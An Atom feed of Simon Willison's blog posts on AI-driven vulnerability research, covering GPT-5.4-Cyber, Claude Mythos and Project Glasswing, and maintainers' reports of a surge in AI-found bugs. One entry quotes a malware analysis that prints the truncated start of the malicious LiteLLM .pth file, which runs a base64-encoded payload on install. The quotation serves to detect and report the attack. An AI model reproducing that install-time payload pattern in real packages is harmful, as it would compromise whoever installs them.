<?xml version="1.0" encoding="utf-8"?>
<feed xml:lang="en-us" xmlns="http://www.w3.org/2005/Atom"><title>Simon Willison's Weblog: ai-security-research</title><link href="http://simonwillison.net/" rel="alternate"/><link href="http://simonwillison.net/tags/ai-security-research.atom" rel="self"/><id>http://simonwillison.net/</id><updated>2026-04-14T21:23:59+00:00</updated><author><name>Simon Willison</name></author><entry><title>Trusted access for the next era of cyber defense</title><link href="https://simonwillison.net/2026/Apr/14/trusted-access-openai/#atom-tag" rel="alternate"/><published>2026-04-14T21:23:59+00:00</published><updated>2026-04-14T21:23:59+00:00</updated><id>https://simonwillison.net/2026/Apr/14/trusted-access-openai/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://openai.com/index/scaling-trusted-access-for-cyber-defense/"&gt;Trusted access for the next era of cyber defense&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
OpenAI's answer to &lt;a href="https://simonwillison.net/2026/Apr/7/project-glasswing/"&gt;Claude Mythos&lt;/a&gt; appears to be a new model called GPT-5.4-Cyber:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;In preparation for increasingly more capable models from OpenAI over the next few months, we are fine-tuning our models specifically to enable defensive cybersecurity use cases, starting today with a variant of GPT‑5.4 trained to be cyber-permissive: GPT‑5.4‑Cyber.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;They're also extending a program they launched in February (which I had missed) called &lt;a href="https://openai.com/index/trusted-access-for-cyber/"&gt;Trusted Access for Cyber&lt;/a&gt;, where users can verify their identity (via a photo of a government-issued ID processed by &lt;a href="https://withpersona.com/"&gt;Persona&lt;/a&gt;) to gain "reduced friction" access to OpenAI's models for cybersecurity work.&lt;/p&gt;
&lt;p&gt;Honestly, this OpenAI announcement is difficult to follow. Unsurprisingly they don't mention Anthropic at all, but much of the piece emphasizes their many years of existing cybersecurity work and their goal to "democratize access" to these tools, hence the emphasis on that self-service verification flow from February.&lt;/p&gt;
&lt;p&gt;If you want access to their best security tools you still need to go through an extra Google Form application process though, which doesn't feel particularly different to me from Anthropic's &lt;a href="https://www.anthropic.com/glasswing"&gt;Project Glasswing&lt;/a&gt;.

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://news.ycombinator.com/item?id=47770770"&gt;Hacker News&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/openai"&gt;openai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/anthropic"&gt;anthropic&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-security-research"&gt;ai-security-research&lt;/a&gt;&lt;/p&gt;



</summary><category term="security"/><category term="ai"/><category term="openai"/><category term="generative-ai"/><category term="llms"/><category term="anthropic"/><category term="ai-security-research"/></entry><entry><title>Cybersecurity Looks Like Proof of Work Now</title><link href="https://simonwillison.net/2026/Apr/14/cybersecurity-proof-of-work/#atom-tag" rel="alternate"/><published>2026-04-14T19:41:48+00:00</published><updated>2026-04-14T19:41:48+00:00</updated><id>https://simonwillison.net/2026/Apr/14/cybersecurity-proof-of-work/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://www.dbreunig.com/2026/04/14/cybersecurity-is-proof-of-work-now.html"&gt;Cybersecurity Looks Like Proof of Work Now&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
The UK's AI Safety Institute recently published &lt;a href="https://www.aisi.gov.uk/blog/our-evaluation-of-claude-mythos-previews-cyber-capabilities"&gt;Our evaluation of Claude Mythos Preview’s cyber capabilities&lt;/a&gt;, their own independent analysis of &lt;a href="https://simonwillison.net/2026/Apr/7/project-glasswing/"&gt;Claude Mythos&lt;/a&gt; which backs up Anthropic's claims that it is exceptionally effective at identifying security vulnerabilities.&lt;/p&gt;
&lt;p&gt;Drew Breunig notes that AISI's report shows that the more tokens (and hence money) they spent the better the result they got, which leads to a strong economic incentive to spend as much as possible on security reviews:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;If Mythos continues to find exploits so long as you keep throwing money at it, security is reduced to a brutally simple equation: &lt;strong&gt;to harden a system you need to spend more tokens discovering exploits than attackers will spend exploiting them&lt;/strong&gt;.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;An interesting result of this is that open source libraries become &lt;em&gt;more&lt;/em&gt; valuable, since the tokens spent securing them can be shared across all of their users. This directly counters the idea that the low cost of vibe-coding up a replacement for an open source library makes those open source projects less attractive.


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/open-source"&gt;open-source&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/drew-breunig"&gt;drew-breunig&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/vibe-coding"&gt;vibe-coding&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-security-research"&gt;ai-security-research&lt;/a&gt;&lt;/p&gt;



</summary><category term="open-source"/><category term="ai"/><category term="generative-ai"/><category term="llms"/><category term="drew-breunig"/><category term="vibe-coding"/><category term="ai-security-research"/></entry><entry><title>Anthropic's Project Glasswing - restricting Claude Mythos to security researchers - sounds necessary to me</title><link href="https://simonwillison.net/2026/Apr/7/project-glasswing/#atom-tag" rel="alternate"/><published>2026-04-07T20:52:54+00:00</published><updated>2026-04-07T20:52:54+00:00</updated><id>https://simonwillison.net/2026/Apr/7/project-glasswing/#atom-tag</id><summary type="html">
    &lt;p&gt;Anthropic &lt;em&gt;didn't&lt;/em&gt; release their latest model, Claude Mythos (&lt;a href="https://www-cdn.anthropic.com/53566bf5440a10affd749724787c8913a2ae0841.pdf"&gt;system card PDF&lt;/a&gt;), today. They have instead made it available to a very restricted set of preview partners under their newly announced &lt;a href="https://www.anthropic.com/glasswing"&gt;Project Glasswing&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;The model is a general purpose model, similar to Claude Opus 4.6, but Anthropic claim that its cyber-security research abilities are strong enough that they need to give the software industry as a whole time to prepare.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Mythos Preview has already found thousands of high-severity vulnerabilities, including some in &lt;em&gt;every major operating system and web browser&lt;/em&gt;. Given the rate of AI progress, it will not be long before such capabilities proliferate, potentially beyond actors who are committed to deploying them safely.&lt;/p&gt;
&lt;p&gt;[...]&lt;/p&gt;
&lt;p&gt;Project Glasswing partners will receive access to Claude Mythos Preview to find and fix vulnerabilities or weaknesses in their foundational systems—systems that represent a very large portion of the world’s shared cyberattack surface. We anticipate this work will focus on tasks like local vulnerability detection, black box testing of binaries, securing endpoints, and penetration testing of systems.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;There's a great deal more technical detail in &lt;a href="https://red.anthropic.com/2026/mythos-preview/"&gt; Assessing Claude Mythos Preview’s cybersecurity capabilities&lt;/a&gt; on the Anthropic Red Team blog:&lt;/p&gt;

&lt;blockquote&gt;&lt;p&gt;In one case, Mythos Preview wrote a web browser exploit that chained together four vulnerabilities, writing a complex &lt;a href="https://en.wikipedia.org/wiki/JIT_spraying "&gt;JIT heap spray&lt;/a&gt; that escaped both renderer and OS sandboxes. It autonomously obtained local privilege escalation exploits on Linux and other operating systems by exploiting subtle race conditions and KASLR-bypasses. And it autonomously wrote a remote code execution exploit on FreeBSD's NFS server that granted full root access to unauthenticated users by splitting a 20-gadget ROP chain over multiple packets.&lt;/p&gt;&lt;/blockquote&gt;
&lt;p&gt;Plus this comparison with Claude 4.6 Opus:&lt;/p&gt;
&lt;blockquote&gt;&lt;p&gt;Our internal evaluations showed that Opus 4.6 generally had a near-0% success rate at autonomous exploit development. But Mythos Preview is in a different league. For example, Opus 4.6 turned the vulnerabilities it had found in Mozilla’s Firefox 147 JavaScript engine—all patched in Firefox 148—into JavaScript shell exploits only two times out of several hundred attempts. We re-ran this experiment as a benchmark for Mythos Preview, which developed working exploits 181 times, and achieved register control on 29 more.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Saying "our model is too dangerous to release" is a great way to build buzz around a new model, but in this case I expect their caution is warranted.&lt;/p&gt;
&lt;p&gt;Just a few days (&lt;a href="https://simonwillison.net/2026/Apr/3/"&gt;last Friday&lt;/a&gt;) ago I started a new &lt;a href="https://simonwillison.net/tags/ai-security-research/"&gt;ai-security-research&lt;/a&gt; tag on this blog to acknowledge an uptick in credible security professionals pulling the alarm on how good modern LLMs have got at vulnerability research.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.theregister.com/2026/03/26/greg_kroahhartman_ai_kernel/"&gt;Greg Kroah-Hartman&lt;/a&gt; of the Linux kernel:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Months ago, we were getting what we called 'AI slop,' AI-generated security reports that were obviously wrong or low quality. It was kind of funny. It didn't really worry us.&lt;/p&gt;
&lt;p&gt;Something happened a month ago, and the world switched. Now we have real reports. All open source projects have real reports that are made with AI, but they're good, and they're real.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;a href="https://mastodon.social/@bagder/116336957584445742"&gt;Daniel Stenberg&lt;/a&gt; of &lt;code&gt;curl&lt;/code&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;The challenge with AI in open source security has transitioned from an AI slop tsunami into more of a ... plain security report tsunami. Less slop but lots of reports. Many of them really good.&lt;/p&gt;
&lt;p&gt;I'm spending hours per day on this now. It's intense.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;And Thomas Ptacek published &lt;a href="https://sockpuppet.org/blog/2026/03/30/vulnerability-research-is-cooked/"&gt;Vulnerability Research Is Cooked&lt;/a&gt;, a post inspired by his &lt;a href="https://securitycryptographywhatever.com/2026/03/25/ai-bug-finding/"&gt;podcast conversation&lt;/a&gt; with Anthropic's Nicholas Carlini.&lt;/p&gt;
&lt;p&gt;Anthropic have a 5 minute &lt;a href="https://www.youtube.com/watch?v=INGOC6-LLv0"&gt;talking heads video&lt;/a&gt; describing the Glasswing project. Nicholas Carlini appears as one of those talking heads, where he said (highlights mine):&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;It has the ability to chain together vulnerabilities. So what this means is you find two vulnerabilities, either of which doesn't really get you very much independently. But this model is able to create exploits out of three, four, or sometimes five vulnerabilities that in sequence give you some kind of very sophisticated end outcome. [...]&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;I've found more bugs in the last couple of weeks than I found in the rest of my life combined&lt;/strong&gt;. We've used the model to scan a bunch of open source code, and the thing that we went for first was operating systems, because this is the code that underlies the entire internet infrastructure. &lt;strong&gt;For OpenBSD, we found a bug that's been present for 27 years, where I can send a couple of pieces of data to any OpenBSD server and crash it&lt;/strong&gt;. On Linux, we found a number of vulnerabilities where as a user with no permissions, I can elevate myself to the administrator by just running some binary on my machine. For each of these bugs, we told the maintainers who actually run the software about them, and they went and fixed them and have deployed the patches  patches so that anyone who runs the software is no longer vulnerable to these attacks.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I found this on the &lt;a href="https://www.openbsd.org/errata78.html"&gt;OpenBSD 7.8 errata page&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;025: RELIABILITY FIX: March 25, 2026&lt;/strong&gt;  &lt;em&gt;All architectures&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;TCP packets with invalid SACK options could crash the kernel.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://ftp.openbsd.org/pub/OpenBSD/patches/7.8/common/025_sack.patch.sig"&gt;A source code patch exists which remedies this problem.&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I tracked that change down in the &lt;a href="https://github.com/openbsd/src"&gt;GitHub mirror&lt;/a&gt; of the OpenBSD CVS repo (apparently they still use CVS!) and found it &lt;a href="https://github.com/openbsd/src/blame/master/sys/netinet/tcp_input.c#L2461"&gt;using git blame&lt;/a&gt;:&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2026/openbsd-27-years.jpg" alt="Screenshot of a Git blame view of C source code around line 2455 showing TCP SACK hole validation logic. Code includes checks using SEQ_GT, SEQ_LT macros on fields like th-&amp;gt;th_ack, tp-&amp;gt;snd_una, sack.start, sack.end, tp-&amp;gt;snd_max, and tp-&amp;gt;snd_holes. Most commits are from 25–27 years ago with messages like &amp;quot;more SACK hole validity testin...&amp;quot; and &amp;quot;knf&amp;quot;, while one recent commit from 3 weeks ago (&amp;quot;Ignore TCP SACK packets wit...&amp;quot;) is highlighted with an orange left border, adding a new guard &amp;quot;if (SEQ_LT(sack.start, tp-&amp;gt;snd_una)) continue;&amp;quot;" style="max-width: 100%;" /&gt;&lt;/p&gt;
&lt;p&gt;Sure enough, the surrounding code is from 27 years ago.&lt;/p&gt;
&lt;p&gt;I'm not sure which Linux vulnerability Nicholas was describing, but it may have been &lt;a href="https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=5133b61aaf437e5f25b1b396b14242a6bb0508e2"&gt;this NFS one&lt;/a&gt; recently covered &lt;a href="https://mtlynch.io/claude-code-found-linux-vulnerability/"&gt;by Michael Lynch
&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;There's enough smoke here that I believe there's a fire. It's not surprising to find vulnerabilities in decades-old software, especially given that they're mostly written in C, but what's new is that coding agents run by the latest frontier LLMs are proving tirelessly capable at digging up these issues.&lt;/p&gt;
&lt;p&gt;I actually thought to myself on Friday that this sounded like an industry-wide reckoning in the making, and that it might warrant a huge investment of time and money to get ahead of the inevitable barrage of vulnerabilities. Project Glasswing incorporates "$100M in usage credits ... as well as $4M in direct donations to open-source security organizations". Partners include AWS, Apple, Microsoft, Google, and the Linux Foundation. It would be great to see OpenAI involved as well - GPT-5.4 already has a strong reputation for finding security vulnerabilities and they have stronger models on the near horizon.&lt;/p&gt;
&lt;p&gt;The bad news for those of us who are &lt;em&gt;not&lt;/em&gt; trusted partners is this:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;We do not plan to make Claude Mythos Preview generally available, but our eventual goal is to enable our users to safely deploy Mythos-class models at scale—for cybersecurity purposes, but also for the myriad other benefits that such highly capable models will bring. To do so, we need to make progress in developing cybersecurity (and other) safeguards that detect and block the model’s most dangerous outputs. We plan to launch new safeguards with an upcoming Claude Opus model, allowing us to improve and refine them with a model that does not pose the same level of risk as Mythos Preview.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I can live with that. I think the security risks really are credible here, and having extra time for trusted teams to get ahead of them is a reasonable trade-off.&lt;/p&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/thomas-ptacek"&gt;thomas-ptacek&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/anthropic"&gt;anthropic&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/nicholas-carlini"&gt;nicholas-carlini&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-ethics"&gt;ai-ethics&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llm-release"&gt;llm-release&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-security-research"&gt;ai-security-research&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="security"/><category term="thomas-ptacek"/><category term="ai"/><category term="generative-ai"/><category term="llms"/><category term="anthropic"/><category term="nicholas-carlini"/><category term="ai-ethics"/><category term="llm-release"/><category term="ai-security-research"/></entry><entry><title>Vulnerability Research Is Cooked</title><link href="https://simonwillison.net/2026/Apr/3/vulnerability-research-is-cooked/#atom-tag" rel="alternate"/><published>2026-04-03T23:59:08+00:00</published><updated>2026-04-03T23:59:08+00:00</updated><id>https://simonwillison.net/2026/Apr/3/vulnerability-research-is-cooked/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://sockpuppet.org/blog/2026/03/30/vulnerability-research-is-cooked/"&gt;Vulnerability Research Is Cooked&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Thomas Ptacek's take on the sudden and enormous impact the latest frontier models are having on the field of vulnerability research.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Within the next few months, coding agents will drastically alter both the practice and the economics of exploit development. Frontier model improvement won’t be a slow burn, but rather a step function. Substantial amounts of high-impact vulnerability research (maybe even most of it) will happen simply by pointing an agent at a source tree and typing “find me zero days”.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Why are agents so good at this? A combination of baked-in knowledge, pattern matching ability and brute force:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;You can't design a better problem for an LLM agent than exploitation research.&lt;/p&gt;
&lt;p&gt;Before you feed it a single token of context, a frontier LLM already encodes supernatural amounts of correlation across vast bodies of source code. Is the Linux KVM hypervisor connected to the &lt;code&gt;hrtimer&lt;/code&gt; subsystem, &lt;code&gt;workqueue&lt;/code&gt;, or &lt;code&gt;perf_event&lt;/code&gt;? The model knows.&lt;/p&gt;
&lt;p&gt;Also baked into those model weights: the complete library of documented "bug classes" on which all exploit development builds: stale pointers, integer mishandling, type confusion, allocator grooming, and all the known ways of promoting a wild write to a controlled 64-bit read/write in Firefox.&lt;/p&gt;
&lt;p&gt;Vulnerabilities are found by pattern-matching bug classes and constraint-solving for reachability and exploitability. Precisely the implicit search problems that LLMs are most gifted at solving. Exploit outcomes are straightforwardly testable success/failure trials. An agent never gets bored and will search forever if you tell it to.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The article was partly inspired by &lt;a href="https://securitycryptographywhatever.com/2026/03/25/ai-bug-finding/"&gt;this episode of the Security Cryptography Whatever podcast&lt;/a&gt;, where David Adrian, Deirdre Connolly, and Thomas interviewed Anthropic's Nicholas Carlini for 1 hour 16 minutes.&lt;/p&gt;
&lt;p&gt;I just started a new tag here for &lt;a href="https://simonwillison.net/tags/ai-security-research/"&gt;ai-security-research&lt;/a&gt; - it's up to 11 posts already.


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/thomas-ptacek"&gt;thomas-ptacek&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/careers"&gt;careers&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/nicholas-carlini"&gt;nicholas-carlini&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-ethics"&gt;ai-ethics&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-security-research"&gt;ai-security-research&lt;/a&gt;&lt;/p&gt;



</summary><category term="security"/><category term="thomas-ptacek"/><category term="careers"/><category term="ai"/><category term="generative-ai"/><category term="llms"/><category term="nicholas-carlini"/><category term="ai-ethics"/><category term="ai-security-research"/></entry><entry><title>Quoting Willy Tarreau</title><link href="https://simonwillison.net/2026/Apr/3/willy-tarreau/#atom-tag" rel="alternate"/><published>2026-04-03T21:48:22+00:00</published><updated>2026-04-03T21:48:22+00:00</updated><id>https://simonwillison.net/2026/Apr/3/willy-tarreau/#atom-tag</id><summary type="html">
    &lt;blockquote cite="https://lwn.net/Articles/1065620/"&gt;&lt;p&gt;On the kernel security list we've seen a huge bump of reports. We were between 2 and 3 per week maybe two years ago, then reached probably 10 a week over the last year with the only difference being only AI slop, and now since the beginning of the year we're around 5-10 per day depending on the days (fridays and tuesdays seem the worst). Now most of these reports are correct, to the point that we had to bring in more maintainers to help us.&lt;/p&gt;
&lt;p&gt;And we're now seeing on a daily basis something that never happened before: duplicate reports, or the same bug found by two different people using (possibly slightly) different tools.&lt;/p&gt;&lt;/blockquote&gt;
&lt;p class="cite"&gt;&amp;mdash; &lt;a href="https://lwn.net/Articles/1065620/"&gt;Willy Tarreau&lt;/a&gt;, Lead Software Developer. HAPROXY&lt;/p&gt;

    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/linux"&gt;linux&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-security-research"&gt;ai-security-research&lt;/a&gt;&lt;/p&gt;



</summary><category term="security"/><category term="linux"/><category term="generative-ai"/><category term="ai"/><category term="llms"/><category term="ai-security-research"/></entry><entry><title>Quoting Daniel Stenberg</title><link href="https://simonwillison.net/2026/Apr/3/daniel-stenberg/#atom-tag" rel="alternate"/><published>2026-04-03T21:46:07+00:00</published><updated>2026-04-03T21:46:07+00:00</updated><id>https://simonwillison.net/2026/Apr/3/daniel-stenberg/#atom-tag</id><summary type="html">
    &lt;blockquote cite="https://mastodon.social/@bagder/116336957584445742"&gt;&lt;p&gt;The challenge with AI in open source security has transitioned from an AI slop tsunami into more of a ... plain security report tsunami. Less slop but lots of reports. Many of them really good.&lt;/p&gt;
&lt;p&gt;I'm spending hours per day on this now. It's intense.&lt;/p&gt;&lt;/blockquote&gt;
&lt;p class="cite"&gt;&amp;mdash; &lt;a href="https://mastodon.social/@bagder/116336957584445742"&gt;Daniel Stenberg&lt;/a&gt;, lead developer of cURL&lt;/p&gt;

    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/daniel-stenberg"&gt;daniel-stenberg&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/curl"&gt;curl&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-security-research"&gt;ai-security-research&lt;/a&gt;&lt;/p&gt;



</summary><category term="daniel-stenberg"/><category term="security"/><category term="curl"/><category term="generative-ai"/><category term="ai"/><category term="llms"/><category term="ai-security-research"/></entry><entry><title>Quoting Greg Kroah-Hartman</title><link href="https://simonwillison.net/2026/Apr/3/greg-kroah-hartman/#atom-tag" rel="alternate"/><published>2026-04-03T21:44:41+00:00</published><updated>2026-04-03T21:44:41+00:00</updated><id>https://simonwillison.net/2026/Apr/3/greg-kroah-hartman/#atom-tag</id><summary type="html">
    &lt;blockquote cite="https://www.theregister.com/2026/03/26/greg_kroahhartman_ai_kernel/"&gt;&lt;p&gt;Months ago, we were getting what we called 'AI slop,' AI-generated security reports that were obviously wrong or low quality. It was kind of funny. It didn't really worry us.&lt;/p&gt;
&lt;p&gt;Something happened a month ago, and the world switched. Now we have real reports. All open source projects have real reports that are made with AI, but they're good, and they're real.&lt;/p&gt;&lt;/blockquote&gt;
&lt;p class="cite"&gt;&amp;mdash; &lt;a href="https://www.theregister.com/2026/03/26/greg_kroahhartman_ai_kernel/"&gt;Greg Kroah-Hartman&lt;/a&gt;, Linux kernel maintainer (&lt;a href="https://en.wikipedia.org/wiki/Greg_Kroah-Hartman"&gt;bio&lt;/a&gt;), in conversation with Steven J. Vaughan-Nichols&lt;/p&gt;

    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/linux"&gt;linux&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-security-research"&gt;ai-security-research&lt;/a&gt;&lt;/p&gt;



</summary><category term="security"/><category term="linux"/><category term="generative-ai"/><category term="ai"/><category term="llms"/><category term="ai-security-research"/></entry><entry><title>My minute-by-minute response to the LiteLLM malware attack</title><link href="https://simonwillison.net/2026/Mar/26/response-to-the-litellm-malware-attack/#atom-tag" rel="alternate"/><published>2026-03-26T23:58:22+00:00</published><updated>2026-03-26T23:58:22+00:00</updated><id>https://simonwillison.net/2026/Mar/26/response-to-the-litellm-malware-attack/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://futuresearch.ai/blog/litellm-attack-transcript/"&gt;My minute-by-minute response to the LiteLLM malware attack&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Callum McMahon reported the &lt;a href="https://simonwillison.net/2026/Mar/24/malicious-litellm/"&gt;LiteLLM malware attack&lt;/a&gt; to PyPI. Here he shares the Claude transcripts he used to help him confirm the vulnerability and decide what to do about it. Claude even suggested the PyPI security contact address after confirming the malicious code in a Docker container:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Confirmed&lt;/strong&gt;. Fresh download from PyPI right now in an isolated Docker container:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Inspecting: litellm-1.82.8-py3-none-any.whl
FOUND: litellm_init.pth
SIZE: 34628 bytes
FIRST 200 CHARS:
import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('aW1wb3J0IHN1YnByb2Nlc3MKaW1wb3J0IHRlbXBmaWxl...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The malicious &lt;code&gt;litellm==1.82.8&lt;/code&gt; is &lt;strong&gt;live on PyPI right now&lt;/strong&gt; and anyone installing or upgrading litellm will be infected. This needs to be reported to security@pypi.org immediately.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I was chuffed to see Callum use my &lt;a href="https://github.com/simonw/claude-code-transcripts"&gt;claude-code-transcripts&lt;/a&gt; tool to publish the transcript of the conversation.

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://news.ycombinator.com/item?id=47531967"&gt;Hacker News&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/pypi"&gt;pypi&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude"&gt;claude&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/supply-chain"&gt;supply-chain&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-security-research"&gt;ai-security-research&lt;/a&gt;&lt;/p&gt;



</summary><category term="pypi"/><category term="security"/><category term="ai"/><category term="generative-ai"/><category term="llms"/><category term="claude"/><category term="supply-chain"/><category term="ai-security-research"/></entry><entry><title>Quoting Thomas Ptacek</title><link href="https://simonwillison.net/2026/Feb/8/thomas-ptacek/#atom-tag" rel="alternate"/><published>2026-02-08T02:25:53+00:00</published><updated>2026-02-08T02:25:53+00:00</updated><id>https://simonwillison.net/2026/Feb/8/thomas-ptacek/#atom-tag</id><summary type="html">
    &lt;blockquote cite="https://twitter.com/tqbf/status/2019493645888462993"&gt;&lt;p&gt;People on the orange site are laughing at this, assuming it's just an ad and that there's nothing to it. Vulnerability researchers I talk to do not think this is a joke. As an erstwhile vuln researcher myself: do not bet against LLMs on this.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.axios.com/2026/02/05/anthropic-claude-opus-46-software-hunting"&gt;Axios: Anthropic's Claude Opus 4.6 uncovers 500 zero-day flaws in open-source&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I think vulnerability research might be THE MOST LLM-amenable software engineering problem. Pattern-driven. Huge corpus of operational public patterns. Closed loops. Forward progress from stimulus/response tooling. Search problems.&lt;/p&gt;
&lt;p&gt;Vulnerability research outcomes are in THE MODEL CARDS for frontier labs. Those companies have so much money they're literally distorting the economy. Money buys vuln research outcomes. Why would you think they were faking any of this?&lt;/p&gt;&lt;/blockquote&gt;
&lt;p class="cite"&gt;&amp;mdash; &lt;a href="https://twitter.com/tqbf/status/2019493645888462993"&gt;Thomas Ptacek&lt;/a&gt;&lt;/p&gt;

